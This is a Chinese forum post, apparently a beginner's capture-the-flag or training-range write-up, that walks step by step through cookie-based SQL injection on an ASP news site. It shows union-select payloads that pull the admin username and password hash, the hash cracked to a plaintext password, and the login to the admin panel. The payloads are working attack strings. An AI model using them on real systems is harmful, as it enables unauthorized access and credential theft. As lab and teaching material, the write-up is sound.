【小白ABC】学习挑战第二关。

abcabc   ·   发表于 2021-08-05 17:23:29   ·   闲聊灌水区

1.http://59.63.200.79:8004/index.asp
第一步,打开网站,确定为asp类型网页
2.http://59.63.200.79:8004/shownews.asp?id=171
第二步,打开网页中行业新闻,确定有数据库
3.http://59.63.200.79:8004/shownews.asp?id=171 order by 10
第三步,尝试输入字符拼接sql语句
4.http://59.63.200.79:8004/shownews.asp?id=171 order by 11
第四步,页面出现错误!返回数据库错误,证明此页面存在sql注入,也测试出此表拥有10个字段
5.http://59.63.200.79:8004/shownews.asp?id=171 union select 1,2,3,4,5,6,7,8,9,10 from admin
第五步,拼接查询语句,通过from,看页面返回是否正常来猜测有没有admin这个表
6.http://59.63.200.79:8004/index.asp
第六步,利用ModHeader插件(火狐-打开应用程序菜单-更多工具-面向开发者的扩展-查找ModHeader插件-安装即可),
这证明cookie里的id=171,也能正常传参,被当作sql语句拼接。那我们直接进行注入。
7.http://59.63.200.79:8004/index.asp
第七步,新建cookie id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin,页面回显2、3、7、8、9
8.http://59.63.200.79:8004/index.asp
第八步,新建cookie id=171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin,
页面回显username和password字段的值admin、b9a2a2b5dffb918c
9.打开www.cmd5.com
第九步,将b9a2a2b5dffb918c进行解密。显示解密为welcome
10.http://59.63.200.79:8004/admin/
第十步,出现管理员登录页面,输入用户名admin、密码welcome,填写验证码。
成功登陆!到此,成功绕过防护注入得到密码,登陆后台拿到FLAG!

打赏我,让我更有动力~

2 条回复   |  直到 2022-4-17 | 1035 次浏览

abcabc
发表于 2021-8-5

一楼是我的

评论列表

  • 加载数据中...

编写评论内容

enjoy420
发表于 2022-4-17

可以带我上道吗?boss

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.